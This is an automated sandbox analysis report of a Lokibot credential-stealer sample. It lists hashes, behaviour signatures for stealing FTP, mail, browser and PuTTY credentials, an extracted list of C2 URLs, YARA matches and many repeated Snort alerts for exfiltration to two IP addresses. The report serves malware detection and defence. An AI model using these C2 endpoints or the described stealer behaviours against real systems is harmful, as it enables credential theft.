Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report aZOmps0Ug8

Overview

General Information

Sample Name:aZOmps0Ug8 (renamed file extension from none to exe)
Analysis ID:502657
MD5:70d177abc7455c709ae9710630b9ea49
SHA1:4d81e55880a35c0157046560eca20b9f528838f4
SHA256:b87ecdb8035fa8b5ce87570d757265182a9f49122a02e77dc7f414816cf4b511
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Lokibot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • aZOmps0Ug8.exe (PID: 6780 cmdline: 'C:\Users\user\Desktop\aZOmps0Ug8.exe' MD5: 70D177ABC7455C709AE9710630B9EA49)
    • aZOmps0Ug8.exe (PID: 3980 cmdline: 'C:\Users\user\Desktop\aZOmps0Ug8.exe' MD5: 70D177ABC7455C709AE9710630B9EA49)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
    • 0x13e78:$s1: http://
    • 0x17633:$s1: http://
    • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
    • 0x13e80:$s2: https://
    • 0x13e78:$f1: http://
    • 0x17633:$f1: http://
    • 0x13e80:$f2: https://
    00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.1.aZOmps0Ug8.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          1.1.aZOmps0Ug8.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.1.aZOmps0Ug8.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              1.1.aZOmps0Ug8.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                1.1.aZOmps0Ug8.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                Click to see the 26 entries

                Sigma Overview

                No Sigma rule has matched

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php"]}
                Multi AV Scanner detection for submitted fileShow sources
                Source: aZOmps0Ug8.exeVirustotal: Detection: 43%Perma Link
                Antivirus detection for URL or domainShow sources
                Source: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpAvira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URLShow sources
                Source: 74f26d34ffff049368a6cff8812f86ee.gqVirustotal: Detection: 13%Perma Link
                Source: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpVirustotal: Detection: 16%Perma Link
                Machine Learning detection for sampleShow sources
                Source: aZOmps0Ug8.exeJoe Sandbox ML: detected

                Compliance:

                barindex
                Detected unpacking (overwrites its own PE header)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeUnpacked PE file: 1.2.aZOmps0Ug8.exe.400000.0.unpack
                Source: aZOmps0Ug8.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: Binary string: wntdll.pdbUGP source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49779 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49779 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49779 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49779 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49780 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49780 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49780 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49780 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49782 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49782 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49782 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49782 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49783 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49783 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49783 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49783 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49784 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49784 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49784 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49784 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49785 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49785 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49785 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49785 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49786 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49786 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49786 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49786 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49788 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49788 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49788 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49788 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49790 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49790 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49790 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49790 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49792 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49792 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49792 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49792 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49794 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49794 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49794 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49794 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49798 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49798 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49798 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49798 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49801 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49801 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49801 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49801 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49803 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49803 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49803 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49803 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49808 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49808 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49808 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49808 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49811 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49811 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49811 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49811 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49813 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49813 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49813 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49813 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49816 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49816 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49816 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49816 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49817 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49817 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49817 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49817 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49820 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49820 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49820 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49820 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49826 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49826 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49826 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49826 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49834 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49834 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49834 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49834 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49843 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49843 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49843 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49843 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49853 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49853 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49853 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49853 -> 172.67.219.104:80
